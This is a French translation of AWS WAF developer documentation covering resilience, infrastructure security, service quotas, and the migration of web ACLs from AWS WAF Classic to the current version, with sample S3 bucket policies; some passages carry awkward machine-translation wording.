Votre responsabilité en matière de conformité lors de l'utilisation Services AWS est déterminée par la sensibilité de vos données, les objectifs de conformité de votre entreprise et les lois et réglementations applicables. Pour plus d'informations sur votre responsabilité en matière de conformité lors de l'utilisation Services AWS, consultez [AWS la documentation de sécurité](https://docs.aws.amazon.com/security/).

# Renforcer la résilience dans AWS WAF
<a name="disaster-recovery-resiliency"></a>

Cette section explique comment AWS l'architecture prend en charge la redondance des données pour. AWS WAF

L'infrastructure AWS mondiale est construite autour Régions AWS de zones de disponibilité. Régions AWS fournissent plusieurs zones de disponibilité physiquement séparées et isolées, connectées par un réseau à faible latence, à haut débit et hautement redondant. Avec les zones de disponibilité, vous pouvez concevoir et exploiter des applications et des bases de données qui basculent automatiquement d’une zone de disponibilité à l’autre sans interruption. Les zones de disponibilité sont plus hautement disponibles, tolérantes aux pannes et évolutives que les infrastructures traditionnelles à un ou plusieurs centres de données. 

Pour plus d'informations sur les zones de disponibilité Régions AWS et les zones de disponibilité, consultez la section [Infrastructure AWS globale](https://aws.amazon.com/about-aws/global-infrastructure/).

# Sécurité de l'infrastructure dans AWS WAF
<a name="infrastructure-security"></a>

Cette section explique comment AWS WAF isoler le trafic des services.

En tant que service géré, AWS WAF il est protégé par la sécurité du réseau AWS mondial. Pour plus d'informations sur les services AWS de sécurité et sur la manière dont AWS l'infrastructure est protégée, consultez la section [Sécurité du AWS cloud](https://aws.amazon.com/security/). Pour concevoir votre AWS environnement en utilisant les meilleures pratiques en matière de sécurité de l'infrastructure, consultez la section [Protection de l'infrastructure](https://docs.aws.amazon.com/wellarchitected/latest/security-pillar/infrastructure-protection.html) dans le cadre * AWS bien architecturé du pilier de sécurité*.

Vous utilisez des appels d'API AWS publiés pour accéder AWS WAF via le réseau. Les clients doivent prendre en charge les éléments suivants :
+ Protocole TLS (Transport Layer Security). Nous exigeons TLS 1.2 et recommandons TLS 1.3.
+ Ses suites de chiffrement PFS (Perfect Forward Secrecy) comme DHE (Ephemeral Diffie-Hellman) ou ECDHE (Elliptic Curve Ephemeral Diffie-Hellman). La plupart des systèmes modernes tels que Java 7 et les versions ultérieures prennent en charge ces modes.

# AWS WAF quotas
<a name="limits"></a>

**Note**  
Il s'agit de la dernière version de AWS WAF. Pour AWS WAF Classic, voir[AWS WAF classique](classic-waf-chapter.md).

AWS WAF est soumis aux quotas suivants (anciennement appelés limites). Ces quotas sont les mêmes pour toutes les régions dans lesquelles AWS WAF il est disponible. Chaque région est soumise à ces quotas individuellement. Les quotas ne sont pas cumulés entre les différentes régions.

AWS WAF a des quotas par défaut sur le nombre maximum d'entités que vous pouvez avoir par compte. Vous pouvez [demander une augmentation](https://console.aws.amazon.com/servicequotas/home/services/wafv2/quotas) de ces quotas.


| Ressource | Quota par défaut par compte et par région | 
| --- | --- | 
|  Nombre maximum de packs de protection (Web ACLs)  |  100  | 
|  Nombre maximum de groupes de règles   |  100  | 
| Nombre maximum d'ensembles d'adresses IP  |  100  | 
| Nombre maximal de demandes par seconde par pack de protection (ACL Web)  |  100 000  | 
| Nombre maximal d'en-têtes de demande personnalisés par pack de protection (ACL Web) ou groupe de règles | 100 | 
| Nombre maximal d'en-têtes de réponse personnalisés par pack de protection (ACL Web) ou groupe de règles | 100 | 
| Nombre maximal de corps de réponse personnalisés par pack de protection (ACL Web) ou groupe de règles | 50 | 
| Nombre maximal de domaines de jetons dans une liste de domaines de jetons d'un pack de protection (ACL Web) | 10 | 
| Nombre maximum d'ensembles de modèles regex  |  10  | 
| Nombre maximal d'associations Application Load Balancer par pack de protection (ACL Web) | 100  | 

Le nombre maximum de demandes par seconde (RPS) autorisé CloudFront est défini CloudFront et décrit dans le [Guide du CloudFront développeur](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/cloudfront-limits.html). AWS WAF 

AWS WAF a fixé des quotas sur les paramètres d'entité suivants par compte et par région. Ces quotas ne peuvent pas être modifiés.


| Ressource | Quota par compte et par région | 
| --- | --- | 
|  Nombre maximal d'unités de capacité du pack de protection (ACL WebWCUs) () par pack de protection (ACL Web) \$1  |  5 000  | 
| Maximum WCUs par groupe de règles |  5 000  | 
| Nombre maximum d'instructions de référence par groupe de règles. Dans un groupe de règles, une instruction de référence peut faire référence à un ensemble d'adresses IP ou à un ensemble de modèles regex. |  50  | 
| Nombre maximal d'instructions de référence par pack de protection (ACL Web). Dans un pack de protection (ACL Web), une instruction de référence peut faire référence à un groupe de règles, à un ensemble d'adresses IP ou à un ensemble de modèles regex. |  50  | 
| Nombre maximum d'adresses IP en notation CIDR par ensemble d'adresses IP |  10 000  | 
| Nombre maximum de règles basées sur le débit par pack de protection (ACL Web)  |  10  | 
| Nombre maximum de règles basées sur le taux par groupe de règles |  4  | 
| Fréquence de demande minimum pouvant être défini pour une règle basée sur la fréquence |  10  | 
| Nombre maximum d'adresses IP uniques qui peuvent être limitées par règle basée sur le débit |  10 000  | 
| Nombre maximal de caractères dans une instruction de correspondance de chaîne |  200  | 
| Nombre maximum de caractères dans chaque modèle d'expression régulière |  200  | 
| Nombre maximum de modèles regex uniques par ensemble de modèles regex |  10  | 
| Taille maximale du corps d'une requête Web pouvant être inspecté pour détecter la présence d'Application Load Balancer et de ses protections AWS AppSync  |  8 Ko  | 
| Taille maximale du corps d'une requête Web pouvant être inspectée pour détecter les protections CloudFront API Gateway, Amazon Cognito, App Runner et Verified Access\$1\$1 |  64 Ko  | 
| Nombre maximal de transformations de texte par instruction de règle |  10  | 
| Taille maximale du contenu du corps de réponse personnalisée pour une seule définition de réponse personnalisée |  4 Ko  | 
| Nombre maximum d'en-têtes personnalisés pour une seule définition de réponse personnalisée |  10  | 
| Nombre maximum d'en-têtes personnalisés pour une seule définition de demande personnalisée |  10  | 
| Taille combinée maximale de tout le contenu du corps de réponse pour un seul groupe de règles ou un seul pack de protection (ACL Web) |  50 Ko  | 
| Nombre maximum de codes de pays Geo Match dans une seule règle  |  50  | 

\$1L'utilisation de plus de 1 500 WCUs unités dans un pack de protection (ACL Web) entraîne des coûts supérieurs au prix du pack de protection de base (ACL Web). Pour plus d'informations, veuillez consulter les sections [Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md) et [Tarification d'AWS WAF](https://aws.amazon.com/waf/pricing/).

\$1\$1Par défaut, la limite d'inspection corporelle est fixée à 16 Ko pour les CloudFront ressources API Gateway, Amazon Cognito, App Runner et Verified Access, mais vous pouvez l'augmenter pour n'importe laquelle de ces ressources dans la configuration de votre pack de protection (ACL Web), jusqu'au maximum indiqué. Pour de plus amples informations, veuillez consulter [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md).

AWS WAF dispose des quotas fixes d'appels suivants par compte et par région. Ces quotas s'appliquent au nombre total d'appels au service par tous les moyens disponibles, y compris la console, la CLI AWS CloudFormation, l'API REST et le SDKs. Ces quotas ne peuvent pas être modifiés.


| Type d'appel | Quota par compte et par région | 
| --- | --- | 
| Nombre maximal d'appels à AssociateWebACL |  Une demande toutes les 2 secondes   | 
| Nombre maximal d'appels à DisassociateWebACL |  Une demande toutes les 2 secondes   | 
| Nombre maximal d'appels à GetWebACLForResource  |  Une demande par seconde  | 
| Nombre maximal d'appels à ListResourcesForWebACL |  Une demande par seconde  | 
| Nombre maximal d'appels à GetDecryptedAPIKey |  Une demande toutes les 2 secondes  | 
| Nombre maximal d'appels à toute action Get ou List individuelle, si aucun autre quota n'est défini pour elle  |  Cinq demandes par seconde  | 
| Nombre maximal d'appels à toute action Create, Put ou Update individuelle, si aucun autre quota n'est défini pour elle  |  Une demande par seconde  | 

AWS WAF dispose des quotas fixes suivants pour les appels effectués par tous les comptes d'une même organisation en AWS Organizations. Ces quotas s'appliquent au nombre total d'appels au service par tous les moyens disponibles, y compris la console, la CLI AWS CloudFormation, l'API REST et le SDKs. Ces quotas ne peuvent pas être modifiés.


| Type d'appel | Quota par organisation dans une seule région | 
| --- | --- | 
| Nombre maximum d'appels effectués par tous les comptes d'une organisationListResourcesForWebACL, dans une même région, pour les régions USA Est (Virginie du Nord) (us-east-1), USA Ouest (Oregon) (us-west-2) ou Europe (Irlande) (eu-west-1).  |  12 demandes par seconde  | 
| Nombre maximum d'appels effectués par tous les comptes d'une organisationListResourcesForWebACL, dans une région pour laquelle aucun quota différent n'est indiqué dans ce tableau.  |  6 demandes par seconde  | 

# Migration de vos ressources AWS WAF classiques vers AWS WAF
<a name="waf-migrating-from-classic"></a>

**Avertissement**  
AWS WAF Classic suit un end-of-life processus planifié. Consultez votre AWS Health tableau de bord pour connaître les étapes et les dates spécifiques à votre région.

**Note**  
Il s'agit de la documentation d'**AWS WAF**. Vous ne devez utiliser cette version que si vous avez créé AWS WAF des ressources, telles que des règles et du Web ACLs, AWS WAF avant novembre 2019, et que vous ne les avez pas encore migrées vers la dernière version. Pour migrer votre site Web ACLs, consultez[Migration de vos ressources AWS WAF classiques vers AWS WAF](#waf-migrating-from-classic).  
**Pour la dernière version de AWS WAF**, voir[AWS WAF](waf-chapter.md). 

Cette section fournit des conseils pour migrer vos règles et vos packs de protection (Web ACLs) de AWS WAF Classic vers AWS WAF. AWS WAF est sorti en novembre 2019. Si vous avez créé des ressources telles que des règles et des packs de protection (Web ACLs) à l'aide de AWS WAF Classic, vous devez soit les utiliser à l'aide de AWS WAF Classic, soit les migrer vers cette dernière version. 

**Avertissement**  
AWS WAF Le support classique prendra fin le 30 septembre 2025. 

Avant de commencer votre travail de migration, familiarisez-vous avec AWS WAF le tout en lisant[AWS WAF](waf-chapter.md).

**Topics**
+ [Pourquoi migrer vers AWS WAF ?](waf-migrating-why-migrate.md)
+ [Mises en garde et limites concernant la migration](waf-migrating-caveats.md)
+ [Fonctionnement de la migration](waf-migrating-how-it-works.md)
+ [Migration d'un pack de protection (ACL Web) de AWS WAF Classic vers AWS WAF](waf-migrating-procedure.md)

# Pourquoi migrer vers AWS WAF ?
<a name="waf-migrating-why-migrate"></a>

La dernière version de AWS WAF apporte de nombreuses améliorations par rapport à la version précédente, tout en conservant la plupart des concepts et de la terminologie auxquels vous êtes habitué. 

La liste suivante décrit les principales modifications apportées à la dernière version d' AWS WAF. Avant de poursuivre votre migration, veuillez prendre le temps de consulter cette liste et de vous familiariser avec le reste du AWS WAF guide. 
+ **Support pour AWS WAF Classic prendra fin le 30 septembre 2025.** 
+ **AWS Règles gérées pour AWS WAF** : les groupes de règles désormais disponibles via AWS Managed Rules offrent une protection contre les menaces Web courantes. La plupart de ces groupes de règles sont inclus gratuitement dans AWS WAF. Pour plus d'informations, consultez [AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md) et le billet de blog [Annunding AWS Managed Rules for AWS WAF](https://aws.amazon.com/blogs/aws/announcing-aws-managed-rules-for-aws-waf/).
+ **Nouvelle AWS WAF API** — La nouvelle API vous permet de configurer toutes vos AWS WAF ressources à l'aide d'un seul ensemble de APIs. Pour distinguer les applications régionales et globales, la nouvelle API inclut un paramètre `scope`. Pour plus d'informations sur l'API, consultez les [AWS WAFV2 actions et les](https://docs.aws.amazon.com/waf/latest/APIReference/API_Operations_AWS_WAFV2.html) [types de AWS WAFV2 données](https://docs.aws.amazon.com/waf/latest/APIReference/API_Types_AWS_WAFV2.html).

  Dans le APIs, SDKs CLIs, et AWS CloudFormation, AWS WAF Classic conserve ses schémas de dénomination et cette dernière version de AWS WAF est désignée par un `V2` ou`v2`, selon le contexte.
+ **Quotas de service simplifiés (limites)** : autorise AWS WAF désormais un plus grand nombre de règles par pack de protection (ACL Web) et vous permet d'exprimer des modèles de regex plus longs. Pour de plus amples informations, veuillez consulter [AWS WAF quotas](limits.md).
+ Les **besoins informatiques déterminent les limites de capacité** — Les limites des packs de protection (Web ACLs) sont désormais basées sur les unités de capacité des packs de protection (ACL WebWCUs) (). AWS WAF calcule la valeur d'une règle WCUs en fonction de sa capacité opérationnelle requise. Le total WCUs d'un pack de protection (ACL Web) est égal à la somme WCUs de toutes ses règles et groupes de règles.

  Pour des informations générales sur la WCU, consultez[Comment AWS WAF fonctionne](how-aws-waf-works.md). Pour plus d'informations sur l'utilisation de la WCU par chaque règle, consultez[Utilisation d'instructions de règle dans AWS WAF](waf-rule-statements.md).
+ **Rédaction de règles basée sur des documents** : vous pouvez désormais écrire et exprimer des règles, des groupes de règles et des packs de protection (Web ACLs) au format JSON. Vous n'avez plus besoin d'utiliser des appels d'API individuels pour créer des conditions différentes, puis associer les conditions à une règle. Cela simplifie grandement la façon dont vous écrivez et maintenez votre code. Vous pouvez accéder au format JSON de vos packs de protection (Web ACLs) via la console lorsque vous consultez le pack de protection (ACL Web), en choisissant **Télécharger le pack de protection (ACL Web) au format JSON**. Lorsque vous créez votre propre règle, vous pouvez accéder à sa représentation JSON en choisissant l'**éditeur JSON de règle**.
+ **Imbrication des règles et prise en charge complète des opérations logiques** : vous pouvez écrire des règles combinées complexes en utilisant des instructions de règles logiques et en utilisant l'imbrication. Vous pouvez créer des instructions, telles que `[A AND NOT(B OR C)]`. Pour de plus amples informations, veuillez consulter [Utilisation d'instructions de règles logiques dans AWS WAF](waf-rule-statements-logical.md).
+ **Règles basées sur les taux améliorées** : dans la dernière version de AWS WAF, vous pouvez personnaliser la fenêtre temporelle évaluée par la règle et la manière dont la règle agrège les demandes. Vous pouvez personnaliser l'agrégation en combinant un certain nombre de caractéristiques de requêtes Web. De plus, les dernières règles basées sur les tarifs réagissent plus rapidement aux variations du trafic. Pour de plus amples informations, veuillez consulter [Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md). 
+ **Prise en charge de plages CIDR variables pour les ensembles d'adresses IP** — Les spécifications des ensembles d'adresses IP offrent désormais une plus grande flexibilité dans les plages d'adresses IP. Pour IPv4, AWS WAF prend `/1` en charge`/32`. Pour IPv6, AWS WAF prend `/1` en charge`/128`. Pour de plus amples informations sur les ensembles d'adresses IP, veuillez consulter [Instruction de correspondance d'ensemble d'adresses IP de règle](waf-rule-statement-type-ipset-match.md).
+ **Transformations de texte chaînables** : possibilité d' AWS WAF effectuer plusieurs transformations de texte sur le contenu d'une requête Web avant de l'inspecter. Pour de plus amples informations, veuillez consulter [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).
+ **Expérience de console améliorée** — La nouvelle AWS WAF console intègre un générateur de règles visuel et une conception de console plus intuitive pour l'utilisateur. 
+ **Options étendues pour les AWS WAF politiques de Firewall Manager** : dans le cadre de la gestion des packs de AWS WAF protection par Firewall Manager (Web ACLs), vous pouvez désormais créer un ensemble de groupes de règles AWS WAF traitant en premier et un ensemble de groupes de règles AWS WAF traitant en dernier. Après avoir appliqué la AWS WAF politique, les propriétaires de comptes locaux peuvent ajouter leurs propres groupes de règles qui AWS WAF traitent entre ces deux ensembles. Pour plus d'informations sur les AWS WAF politiques de Firewall Manager, consultez[Utilisation AWS WAF de politiques avec Firewall Manager](waf-policies.md). 
+ **AWS CloudFormation prise en charge de tous les types d'instructions de règles** : AWS WAF in AWS CloudFormation prend en charge tous les types d'instructions de règles pris en charge par la AWS WAF console et l'API. En outre, vous pouvez facilement convertir les règles que vous écrivez en format JSON au format YAML. 



# Mises en garde et limites concernant la migration
<a name="waf-migrating-caveats"></a>

La migration ne gère que les configurations du pack de protection (ACL Web), et la migration du pack de protection (ACL Web) ne prend pas en charge tous les paramètres tels que vous les avez dans AWS WAF Classic. Certains éléments de configuration nécessitent une configuration manuelle dans AWS WAF (v2). Certaines choses ne correspondent pas exactement aux deux versions, et vous devrez décider de la manière dont vous souhaitez configurer les fonctionnalités dans AWS WAF (v2). Certains paramètres, tels que les associations du pack de protection (ACL Web) avec les AWS ressources, sont initialement désactivés dans la nouvelle version afin que vous puissiez les ajouter lorsque vous êtes prêt. 

La liste suivante décrit les mises en garde concernant la migration et les étapes à suivre pour y répondre. Utilisez cette présentation pour planifier votre migration. Plus tard, les étapes détaillées de la migration vous expliquent les étapes d'atténuation recommandées. 
+ **Migration à compte unique** : vous ne pouvez migrer les ressources AWS WAF classiques d'un compte que vers les AWS WAF ressources du même compte. 
+ **Configurations des packs de protection (ACL Web)** uniquement : la migration migre uniquement les packs de protection (Web ACLs ACLs) et les ressources qu'ils utilisent. Pour migrer une ressource, telle qu'un groupe de règles ou un ensemble d'adresses IP, qui n'est utilisée par aucune ACL Web migrée, créez manuellement la ressource dans AWS WAF (v2).
+ **Aucune règle AWS Marketplace gérée** : la migration n'intègre aucune règle gérée par les AWS Marketplace vendeurs. Certains AWS Marketplace vendeurs disposent de règles gérées équivalentes AWS WAF auxquelles vous pouvez vous abonner à nouveau. Avant cela, passez en revue les règles AWS gérées fournies avec la dernière version de AWS WAF. La plupart d'entre eux sont gratuits pour les AWS WAF utilisateurs. Pour de plus amples informations sur les règles gérées, veuillez consulter [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md). 
+ **Aucune association entre le pack de protection (ACL Web)** : la migration n'établit aucune association entre le pack de protection (ACL Web) et les ressources protégées. Ce comportement est intégré à la conception pour éviter d'affecter votre charge de travail de production. Après avoir vérifié que tout est correctement migré, associez le nouveau pack de protection (ACL Web) à vos ressources.
+ **Journalisation désactivée** : la journalisation du pack de protection migré (ACL Web) est désactivée par défaut. Ce comportement est intégré à la conception. Activez la journalisation lorsque vous êtes prêt à passer de la AWS WAF version classique à AWS WAF.
+ **Aucun groupe de AWS Firewall Manager règles** : la migration ne gère pas les groupes de règles gérés par Firewall Manager. Vous pouvez migrer un pack de protection (ACL Web) géré par Firewall Manager, mais la migration n'implique pas le groupe de règles. Au lieu d'utiliser l'outil de migration pour ces packs de protection (Web ACLs), recréez la politique pour le nouveau AWS WAF dans Firewall Manager. 
**Note**  
Les groupes de règles gérés par Firewall Manager pour AWS WAF Classic étaient les groupes de règles Firewall Manager. Dans la nouvelle version de AWS WAF, les groupes de règles sont des groupes de AWS WAF règles. Fonctionnellement, ils sont identiques. 
+ **AWS WAF Avertissement relatif aux automatisations de sécurité** : n'essayez pas de migrer les automatisations de sécurité. AWS WAF La migration ne convertit pas les fonctions Lambda, qui pourraient être utilisées par les automatisations. Envisagez plutôt de déployer les automatisations pour la dernière version. Pour plus d'informations, consultez [AWS WAF la section Automatisations de sécurité](https://aws.amazon.com/solutions/aws-waf-security-automations/).

# Fonctionnement de la migration
<a name="waf-migrating-how-it-works"></a>

Vous pouvez migrer votre site Web ACLs de la AWS WAF version 2 AWS WAF Classic à l'aide de plusieurs méthodes. Suivez ces étapes pour terminer votre migration.

**Pour migrer de la version 2 vers AWS WAF Classic la AWS WAF version 2**

1. Identifiez votre AWS WAF Classic site Web ACLs :
   + Consultez la liste de votre site Web ACLs dans le AWS Health tableau de bord.
   + Utilisez le [script de nettoyage ACL AWS WAF Classic Web](         https://github.com/aws-samples/sample-for-waf-classic-to-wafv2-migrate-and-cleanup/tree/main/scripts/waf-classic-cleanup          ) pour obtenir une liste de tous vos sites Web ACLs et de leurs associations. Cela vous aide à identifier les sites Web qui protègent activement ACLs les ressources et vous permet de supprimer les sites Web inutilisés ACLs.

1. Migrer un site Web individuel ACLs :
   + Suivez le processus de migration décrit dans le [guide du AWS WAF développeur](https://docs.aws.amazon.com/waf/latest/developerguide/waf-migrating-procedure.html).
   + Utilisez l'assistant de migration pour analyser votre ACL AWS WAF Classic Web et générer un AWS CloudFormation modèle.
   + Utilisez le modèle généré pour créer une ACL Web AWS WAF v2 équivalente et terminer la migration.

1. Pour plusieurs sites Web éligibles ACLs :
   + Utilisez le [script de migration AWS WAF en bloc](https://github.com/aws-samples/sample-for-waf-classic-to-wafv2-migrate-and-cleanup/tree/main/scripts/waf-classic-migration          ) pour migrer ACLs simultanément plusieurs AWS WAF Classic sites Web éligibles.

1. Pour le Web ACLs géré par AWS Firewall Manager :
   + Les politiques de Firewall Manager utilisent AWS WAF Classic le Web ACLs avec AWS WAF Classic des politiques. Pour les politiques Shield Advanced créées avant janvier 2022, Firewall Manager utilise également AWS WAF Classic le Web ACLs. Vous devez migrer ces politiques pour utiliser le Web AWS WAF v2 ACLs.

     Suivez les instructions décrites dans [Migration du AWS WAF Classic Web ACLs dans Firewall Manager](migrate-waf-classic-fms.md).

**Important**  
Nous vous recommandons de ACLto vérifier que chaque site Web migré répond à vos exigences de sécurité avant de l'associer à vos ressources.

# Migration d'un pack de protection (ACL Web) de AWS WAF Classic vers AWS WAF
<a name="waf-migrating-procedure"></a>

La migration automatisée prend en charge la majeure partie de la configuration de votre pack de protection AWS WAF classique (ACL Web), vous laissant certaines tâches à gérer manuellement.

**Note**  
Certaines configurations de protection ne peuvent pas être migrées automatiquement et nécessitent une configuration manuelle dans AWS WAF (v2). Consultez la liste à l'adresse[Mises en garde et limites concernant la migration](waf-migrating-caveats.md).

La section suivante répertorie les étapes de haut niveau de la migration d'un pack de protection (ACL Web). 

1. La migration automatique lit tout ce qui concerne votre pack de protection existant (ACL Web), sans rien modifier ni supprimer dans AWS WAF Classic. Il crée une représentation de l'ACL Web et de ses ressources associées, compatible avec AWS WAF. Il génère un CloudFormation modèle pour le nouveau pack de protection (ACL Web) et le stocke dans un compartiment Amazon S3. 

1. Vous déployez le modèle dans CloudFormation, afin de recréer le pack de protection (ACL Web) et les ressources associées dans AWS WAF. 

1. Vous passez en revue le pack de protection (ACL Web) et vous terminez manuellement la migration, en vous assurant que votre nouveau pack de protection (ACL Web) tire pleinement parti des fonctionnalités de la dernière version AWS WAF. 

1. Vous basculez manuellement vos ressources protégées vers le nouveau pack de protection (ACL Web). 

**Topics**
+ [Migration d'un pack de protection (ACL Web) : migration automatisée](waf-migrating-procedure-automatic.md)
+ [Migration d'un pack de protection (ACL Web) : suivi manuel](waf-migrating-procedure-manual-finish.md)
+ [Migration d'un pack de protection (ACL Web) : considérations supplémentaires](waf-migrating-procedure-additional.md)
+ [Migration d'un pack de protection (ACL Web) : basculement](waf-migrating-procedure-switchover.md)

# Migration d'un pack de protection (ACL Web) : migration automatisée
<a name="waf-migrating-procedure-automatic"></a>

**Pour migrer automatiquement une configuration de pack de protection (ACL Web) de AWS WAF Classic vers AWS WAF**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Choisissez **Basculer vers la AWS WAF version classique** et passez en revue les paramètres de configuration du pack de protection (ACL Web). Notez les paramètres en tenant compte des mises en garde et des limites décrites dans la section précédente, [Mises en garde et limites concernant la migration](waf-migrating-caveats.md).

1. Dans le dialogue d'information en haut de la page, recherchez la phrase commençant par les **packs de protection Migrate (Web ACLs)** et cliquez sur le lien vers l'**assistant de migration**. Cette opération lance l'assistant de migration.

   Si la boîte de dialogue d'information ne s'affiche pas, cela signifie que vous l'avez peut-être fermée depuis le lancement de la console AWS WAF Classic. Dans la barre de navigation, choisissez **Basculer vers le nouveau**, AWS WAF puis sélectionnez **Basculer vers le mode AWS WAF classique**, et la boîte de dialogue d'information devrait réapparaître.

1. Sélectionnez le pack de protection (ACL Web) que vous souhaitez migrer. 

1. Pour **la configuration de la migration**, fournissez un compartiment Amazon S3 à utiliser pour le modèle. Vous avez besoin d'un compartiment Amazon S3 correctement configuré pour l'API de migration afin de stocker le AWS CloudFormation modèle généré. 
   + Si le compartiment est chiffré, le chiffrement doit utiliser les clés Amazon S3 (SSE-S3). La migration ne prend pas en charge le chiffrement avec des AWS Key Management Service clés (SSE-KMS).
   + Le nom du compartiment doit commencer par `aws-waf-migration-`. Par exemple, `aws-waf-migration-my-web-acl`.
   + Le compartiment doit se trouver dans la région où vous déployez le modèle. Par exemple, pour un pack de protection (ACL Web) dans`us-west-2`, vous devez utiliser un compartiment Amazon S3 dans `us-west-2` lequel vous devez déployer la pile de modèles`us-west-2`. 

1. Pour la **stratégie de compartiment S3**, nous vous recommandons de choisir **Appliquer automatiquement la stratégie de compartiment requise pour la migration**. Sinon, si vous souhaitez gérer le compartiment par vous-même, vous devez appliquer manuellement la stratégie de compartiment suivante : 
   + Pour les CloudFront applications Amazon mondiales (`waf`) :

------
#### [ JSON ]

****  

     ```
     {
         "Version":"2012-10-17",		 	 	 
         "Statement": [
             {
                 "Effect": "Allow",
                 "Principal": {
                     "Service": "apiv2migration.waf.amazonaws.com"
                 },
                 "Action": "s3:PutObject",
                 "Resource": "arn:aws:s3:::<BUCKET_NAME>/AWSWAF/<CUSTOMER_ACCOUNT_ID>/*"
             }
         ]
     }
     ```

------
   + Pour les applications Amazon API Gateway ou Application Load Balancer régionales () `waf-regional` :

------
#### [ JSON ]

****  

     ```
     {
         "Version":"2012-10-17",		 	 	 
         "Statement": [
             {
                 "Effect": "Allow",
                 "Principal": {
                     "Service": "apiv2migration.waf-regional.amazonaws.com"
                 },
                 "Action": "s3:PutObject",
                 "Resource": "arn:aws:s3:::<BUCKET_NAME>/AWSWAF/<CUSTOMER_ACCOUNT_ID>/*"
             }
         ]
     }
     ```

------

1. Pour **Choisir comment gérer les règles qui ne peuvent pas être migrées**, choisissez d'exclure les règles qui ne peuvent pas être migrées ou d'arrêter la migration. Pour de plus amples informations sur les règles qui ne peuvent pas être migrées, veuillez consulter [Mises en garde et limites concernant la migration](waf-migrating-caveats.md). 

1. Choisissez **Suivant**. 

1. Pour **Créer un CloudFormation modèle**, vérifiez vos paramètres, puis choisissez **Commencer à créer un CloudFormation modèle** pour démarrer le processus de migration. Cela peut prendre quelques minutes, en fonction de la complexité de votre pack de protection (ACL Web).

1. Dans **Créer et exécuter une CloudFormation pile pour terminer la migration**, vous pouvez choisir d'accéder à la AWS CloudFormation console pour créer une pile à partir du modèle, afin de créer le nouveau pack de protection (ACL Web) et ses ressources. Pour ce faire, choisissez **Create CloudFormation stack**. 

Une fois le processus de migration automatique terminé, vous êtes prêt à passer aux étapes de suivi manuel. Consultez [Migration d'un pack de protection (ACL Web) : suivi manuel](waf-migrating-procedure-manual-finish.md).

# Migration d'un pack de protection (ACL Web) : suivi manuel
<a name="waf-migrating-procedure-manual-finish"></a>

Une fois la migration automatisée terminée, passez en revue le pack de protection nouvellement créé (ACL Web) et renseignez les composants que la migration ne vous propose pas. La procédure suivante couvre les aspects de la gestion des packs de protection (ACL Web) que la migration ne prend pas en charge. Pour la liste, veuillez consulter [Mises en garde et limites concernant la migration](waf-migrating-caveats.md).

**Pour terminer la migration de base - étapes manuelles**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. La console doit automatiquement utiliser la dernière version de AWS WAF. Pour vérifier cela, dans le volet de navigation, vérifiez que l'option **Passer en mode AWS WAF classique est visible**. Si vous voyez **Passer à la nouvelle** version AWS WAF, choisissez-la pour passer à la dernière version. 

1. Dans le volet de navigation, choisissez les **packs de protection (Web ACLs)**. 

1. Sur la page **des packs de protection (Web ACLs)**, recherchez votre nouveau pack de protection (ACL Web) dans la liste de la région où vous l'avez créé. Choisissez le nom du pack de protection (ACL Web) pour afficher les paramètres du pack de protection (ACL Web). 

1. Vérifiez tous les paramètres du nouveau pack de protection (ACL Web) par rapport à votre ancienne ACL Web AWS WAF classique. Par défaut, la journalisation et les associations de ressources protégées sont désactivées. Vous les activez lorsque vous êtes prêt à basculer. 

1. Si votre pack de protection AWS WAF classique (ACL Web) comportait un groupe de règles géré, l'inclusion du groupe de règles n'a pas été prise en compte lors de la migration. Vous pouvez ajouter des groupes de règles gérés au nouveau pack de protection (ACL Web). Consultez les informations relatives aux groupes de règles gérés, notamment la liste des règles AWS gérées disponibles avec la nouvelle version de AWS WAF, à l'adresse[Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md). Pour ajouter un groupe de règles gérées, procédez comme suit :

   1. Sur la page des paramètres de votre pack de protection (ACL Web), choisissez l'onglet **Règles** du pack de protection (ACL Web). 

   1. Choisissez **Ajouter des règles**, puis **Ajouter des groupes de règles gérées**.

   1. Développez la liste pour le fournisseur de votre choix et sélectionnez les groupes de règles que vous souhaitez ajouter. Pour AWS Marketplace les vendeurs, vous devrez peut-être vous abonner aux groupes de règles. Pour plus d'informations sur l'utilisation de groupes de règles gérés dans votre pack de protection (ACL Web), consultez [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md) et[Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md).

Une fois le processus de migration de base terminé, nous vous recommandons d'examiner vos besoins et d'envisager d'autres options, afin de vous assurer que la nouvelle configuration est aussi efficace que possible et qu'elle utilise les dernières options de sécurité disponibles. Consultez [Migration d'un pack de protection (ACL Web) : considérations supplémentaires](waf-migrating-procedure-additional.md).

# Migration d'un pack de protection (ACL Web) : considérations supplémentaires
<a name="waf-migrating-procedure-additional"></a>

Passez en revue votre nouveau pack de protection (ACL Web) et considérez les options qui s'offrent AWS WAF à vous dans le nouveau afin de vous assurer que la configuration est aussi efficace que possible et qu'elle utilise les dernières options de sécurité disponibles. 

**Règles AWS gérées supplémentaires**  
Envisagez d'implémenter des règles AWS gérées supplémentaires dans votre pack de protection (ACL Web) afin d'améliorer le niveau de sécurité de votre application. Ils sont inclus sans AWS WAF frais supplémentaires. AWS Les règles gérées comportent les types de groupes de règles suivants : 
